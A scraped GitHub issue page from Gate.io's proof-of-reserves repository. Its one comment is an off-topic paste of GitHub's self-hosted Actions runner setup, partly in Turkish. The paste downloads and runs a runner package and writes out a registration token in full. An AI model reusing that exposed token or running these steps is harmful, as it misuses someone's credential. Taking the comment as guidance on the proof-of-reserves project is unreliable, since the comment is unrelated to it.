gateio / proof-of-reserves

Codes and Audits Proof of Gate.io holding full reserves of Users' assets
GNU General Public License v3.0
135 stars 90 forks source link

## User Verifies Exchange Assets Run the following command to start the verification ```Plaintext ./main verify cex ``` If the verification is successful, it will output ```Plaintext All proofs verify passed!!! #58

Open omenihuson2 opened 2 months ago

zxramozx commented 1 month ago

Create a folder

$ mkdir actions-runner && cd actions-runner

Copied!

Download the latest runner package

$ curl -o actions-runner-linux-x64-2.317.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.317.0/actions-runner-linux-x64-2.317.0.tar.gz

Optional: Validate the hash

$ echo "9e883d210df8c6028aff475475a457d380353f9d01877d51cc01a17b2a91161d actions-runner-linux-x64-2.317.0.tar.gz" | shasum -a 256 -c

Copied!

Extract the installer

$ tar xzf ./actions-runner-linux-x64-2.317.0.tar.gz

Copied!

Yapılandır

Create the runner and start the configuration experience

$ ./config.sh --url https://github.com/Sarsilmaz-02 --token BDMRCHKYYL2Y5SPV2RIRRFTGUKPVC

Last step, run it!

$ ./run.sh

Kendi barındırdığınız koşucunuzu kullanma

Use this YAML in your workflow file for each job

runs-on: self-hosted7b4e2fe1ee21d27f7cace92cef42aa3dc87966a7